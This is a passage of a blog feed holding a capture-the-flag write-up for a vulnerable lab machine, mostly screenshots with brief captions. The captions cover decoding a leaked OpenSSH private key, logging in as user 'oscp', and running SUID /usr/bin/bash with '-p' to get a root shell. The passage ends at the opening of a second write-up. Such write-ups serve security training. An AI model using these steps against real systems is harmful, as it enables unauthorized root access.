src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEix0F3zs_YMOkPC7Rjm5fUB9GXy1OsX7l3Hn6Yde0qxAAU9ElyYUbcjbJIRyojJ-MOzqzPo8M_cMJyaCyBmaf44Jj3ee2wiY9zlPhZqC1aq5oSuj-LmPbk4knra9_6fPltkyo_8jkbGxbORAm66nxwwewWB2RVXsNDQiDAsaWkYbQPp5zdjlTpAgWeiFg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Transferring &lt;b&gt;secret.txt&lt;/b&gt; to Kali:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjRFSrhx6prTIWkK6R1z6_6r7OxGx-THpEiwVUfQ7fYHKpggTrcXUkkWysKsnLHoXNo5k5sl4YTZ-Pyc5A8SvAo5F9aiiEB5GUcNF0zPrBJ2KzHOKycWXT--Cmz1anACXtC4D7Zc2kAXcNPXml_KQmp_quVIb3s1gPGXygYnE8ZoISOESpbm6evcPol9g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;203&quot; data-original-width=&quot;641&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjRFSrhx6prTIWkK6R1z6_6r7OxGx-THpEiwVUfQ7fYHKpggTrcXUkkWysKsnLHoXNo5k5sl4YTZ-Pyc5A8SvAo5F9aiiEB5GUcNF0zPrBJ2KzHOKycWXT--Cmz1anACXtC4D7Zc2kAXcNPXml_KQmp_quVIb3s1gPGXygYnE8ZoISOESpbm6evcPol9g=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Decoding &lt;b&gt;secret.txt&lt;/b&gt; and passing to a new file named&amp;nbsp;&lt;b&gt;key&lt;/b&gt;, we discover it is an OpenSSH Private key:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgCX_mBFzsTpi5UUyfe0SEJnBsYzoNFR7uUZSL55LN0_wpRalyAtGS0ufZHh5F6q4nA11wEGgFkT8bb3BAohi07plqZDUugmhcwnoyGoZ0Omubck--0QklXy6mrT0217GZoP_ihc6t_l0soQmm-kIdx0U7h2BBiXgP_yAnTM1-YHIjwHCY-G1L-CZPSWQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;31&quot; data-original-width=&quot;598&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgCX_mBFzsTpi5UUyfe0SEJnBsYzoNFR7uUZSL55LN0_wpRalyAtGS0ufZHh5F6q4nA11wEGgFkT8bb3BAohi07plqZDUugmhcwnoyGoZ0Omubck--0QklXy6mrT0217GZoP_ihc6t_l0soQmm-kIdx0U7h2BBiXgP_yAnTM1-YHIjwHCY-G1L-CZPSWQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhBad-xs1CI2p_FOzzOakmlY9n7VwM6bPInqjrR1gCRqI67b-3WK1_uDZJfle-sJERX6Dd0PitGYASwZTuq8p5rzTDERvfyRnomNP2yj5V4Yr945r4s7fe14q6onpy_RFUzsn-dXgqF2DXEa-YspPZTMeTEGih_F9Gsm3mFrqai3Tz3MKz-3g-fGrraWg&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;742&quot; data-original-width=&quot;720&quot; height=&quot;809&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhBad-xs1CI2p_FOzzOakmlY9n7VwM6bPInqjrR1gCRqI67b-3WK1_uDZJfle-sJERX6Dd0PitGYASwZTuq8p5rzTDERvfyRnomNP2yj5V4Yr945r4s7fe14q6onpy_RFUzsn-dXgqF2DXEa-YspPZTMeTEGih_F9Gsm3mFrqai3Tz3MKz-3g-fGrraWg=w785-h809&quot; width=&quot;785&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;3 - EXPLOITATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting right permissions to &lt;b&gt;key&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiLka3pHnq94xvt2eTkK1wVt1cHc75wfH8e_o7vZGEHf6czDcrKPFk9gsO_0tsx13dyph2nJvO_50mekQF-PJt9zzdmX90at3BZc7D5WpvR4qu7RAHnpeOmeUiru4Mmu9e3ItHu1T1qmMyQU3kcyDrgmVaL0CKfuGOfr7i8QfdS6osMSBVsrr6w37oAbA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;24&quot; data-original-width=&quot;394&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiLka3pHnq94xvt2eTkK1wVt1cHc75wfH8e_o7vZGEHf6czDcrKPFk9gsO_0tsx13dyph2nJvO_50mekQF-PJt9zzdmX90at3BZc7D5WpvR4qu7RAHnpeOmeUiru4Mmu9e3ItHu1T1qmMyQU3kcyDrgmVaL0CKfuGOfr7i8QfdS6osMSBVsrr6w37oAbA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now we can SSH with user &lt;b&gt;oscp&lt;/b&gt; and &lt;b&gt;key&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiL9NRHLKyo2b4u_xlcJE7DINT1ATRhKdPTmk0iYwu5SkkH4-7ge7Sj8-pOko8NGMSqBkjkurWTIPK4S7pRaprP9BHnewJq8-Jl6-N8tOhmSQI_ROU3QNyH8FMpIFy_eBupZkX5fLs3EXcYW1qp_ayOyFdw2K_dfvBsuHeOurROvhRdAZg7zTOxYbsTCg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;418&quot; data-original-width=&quot;707&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiL9NRHLKyo2b4u_xlcJE7DINT1ATRhKdPTmk0iYwu5SkkH4-7ge7Sj8-pOko8NGMSqBkjkurWTIPK4S7pRaprP9BHnewJq8-Jl6-N8tOhmSQI_ROU3QNyH8FMpIFy_eBupZkX5fLs3EXcYW1qp_ayOyFdw2K_dfvBsuHeOurROvhRdAZg7zTOxYbsTCg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for binaries with &lt;b&gt;SUID&lt;/b&gt;, let&#39;s focus our attention on &lt;b&gt;/usr/bin/bash&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh4GxE5C3rS05PbV_SlWI21bDL0JkQ7G3aqfATHG14QiesG3yLJh0o3jfUcbVsgxTuY_42M1Epannqf5aDtyGxwr7rYTwRqA2mj3ejifUN3tpJWrEciy6jWpvvhsmVsjJ7gxVw6AEylTK7NnRiskuJmtKQRBiai9SIZPJ3Ni9raR_UtQT1vZeVV-zR1QA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;26&quot; data-original-width=&quot;550&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh4GxE5C3rS05PbV_SlWI21bDL0JkQ7G3aqfATHG14QiesG3yLJh0o3jfUcbVsgxTuY_42M1Epannqf5aDtyGxwr7rYTwRqA2mj3ejifUN3tpJWrEciy6jWpvvhsmVsjJ7gxVw6AEylTK7NnRiskuJmtKQRBiai9SIZPJ3Ni9raR_UtQT1vZeVV-zR1QA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBdUJe6g3f88M6O_0NUZtayOJ51D09TZfNNd7R1kJmy4YOb9I-IMe5rLF5KvGNNm3UrPE3qOlSOvosNe2LLqZxgy0UkOy_VYEiu-naRD2OH9FnxxBow_nyFljO9W03Luv7nRRVEjkOzxeePYXVwSTCp1RBhA08wN99UVmTYdUKATcls7qrniWM8md9Qw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;414&quot; data-original-width=&quot;489&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBdUJe6g3f88M6O_0NUZtayOJ51D09TZfNNd7R1kJmy4YOb9I-IMe5rLF5KvGNNm3UrPE3qOlSOvosNe2LLqZxgy0UkOy_VYEiu-naRD2OH9FnxxBow_nyFljO9W03Luv7nRRVEjkOzxeePYXVwSTCp1RBhA08wN99UVmTYdUKATcls7qrniWM8md9Qw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi1smYAgvLmMV1caIL8GbEkV0F-LL0s8Vydhf7RrIticLw4PVfpsQx8YY5gRzMKeo6YiwsV0CpK97cDWWOSFnJIFEsI11CXb70nY0eT3RkL0yGnmlRt7tsgnfLA3IkUsPEvsAJK5H2Wg8N4fDdrJkhFVuGrwoZdiJ1iXboDjVNYGcQcvy_TG1QqSbMtbw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;46&quot; data-original-width=&quot;639&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi1smYAgvLmMV1caIL8GbEkV0F-LL0s8Vydhf7RrIticLw4PVfpsQx8YY5gRzMKeo6YiwsV0CpK97cDWWOSFnJIFEsI11CXb70nY0eT3RkL0yGnmlRt7tsgnfLA3IkUsPEvsAJK5H2Wg8N4fDdrJkhFVuGrwoZdiJ1iXboDjVNYGcQcvy_TG1QqSbMtbw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Finally it&#39;s easy to get a root shell, just running &lt;b&gt;/usr/bin/bash&lt;/b&gt; with option &lt;b&gt;-p&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg3aUEjIJAc7MELHFLTOHYMJtacdgt3hI_9Z0nTSoKa_O_v2n2pX9J09xtu4YlqeoTVfSPI5OfU7Jd-tRmDr3JBIL_8ZGFjdrRjOlg6tmbln_sd89_9ruyHYKyHfimUia5bv6DnLsjex4qL3ox5SlUqtSY3HhHn7y5Dcv-b5GSdDN6dDut2qTFUAUkbmQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;71&quot; data-original-width=&quot;773&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg3aUEjIJAc7MELHFLTOHYMJtacdgt3hI_9Z0nTSoKa_O_v2n2pX9J09xtu4YlqeoTVfSPI5OfU7Jd-tRmDr3JBIL_8ZGFjdrRjOlg6tmbln_sd89_9ruyHYKyHfimUia5bv6DnLsjex4qL3ox5SlUqtSY3HhHn7y5Dcv-b5GSdDN6dDut2qTFUAUkbmQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - CAPTURING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;root&lt;/b&gt;&#39;s folder and reading the flag:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTr_mG-hAy_lhSSzrU4mPbHB20AHQLMGqAyfJUGk2LNoyBIXcWRusCCtOCHONEh1vbIZA60Hqgc6HFHHzD_ActRtmr8w41gpISV5m3dqmu7wacie29o82fL8lqXvO9qn1mJU8VMg_PDEV9dFqsnpV-bJFqUG46ClReQqsTKIc9elnw_d1iswsgmvxp2A&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;142&quot; data-original-width=&quot;352&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTr_mG-hAy_lhSSzrU4mPbHB20AHQLMGqAyfJUGk2LNoyBIXcWRusCCtOCHONEh1vbIZA60Hqgc6HFHHzD_ActRtmr8w41gpISV5m3dqmu7wacie29o82fL8lqXvO9qn1mJU8VMg_PDEV9dFqsnpV-bJFqUG46ClReQqsTKIc9elnw_d1iswsgmvxp2A=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/49046819424456350'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/49046819424456350'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/infosec-oscp-voucher.html' title='InfoSec OSCP Voucher'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEgKzgj11MiOlrwJ6nVhcm15LsHENuiQnxDr98jYB3QAv9rT3ypT41-tzkSq8E5Q0URcyXmdSC3MCO4_aedxAQSeKcDBssIgQk7OSYZ_VOGBVvnxueceizK_OlQUTx6cdvppbfzhaleW2uMDDiOC_U0QIklkA2p3ESUOXqYN5D2Y9cQR-Z6FcReLepCzHw=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-7881264511459455869</id><published>2022-03-01T08:56:00.000-06:00</published><updated>2022-03-01T12:42:02.249-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Symfonos_5</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;SYMFONOS_5&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEghsO2b3X-NCdl3-8QTAQLurY5-o9xWs0ZdYKgUoyHdNDDagsq8s-rVHWfCxjWyhgbnOb0w_eiSYDBl3qI3SJisXPS1a_zn2p7OWTkY_eTQohSZyWWyS2EdabJvFp4cBqJQj1O8UKnTghzu9pZm2QhaldQD2mYxi1SUz93kLOi8WnHYRwk_uvQ08VclUA=s638&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;245&quot; data-original-width=&quot;638&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEghsO2b3X-NCdl3-8QTAQLurY5-o9xWs0ZdYKgUoyHdNDDagsq8s-rVHWfCxjWyhgbnOb0w_eiSYDBl3qI3SJisXPS1a_zn2p7OWTkY_eTQohSZyWWyS2EdabJvFp4cBqJQj1O8UKnTghzu9pZm2QhaldQD2mYxi1SUz93kLOi8WnHYRwk_uvQ08VclUA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 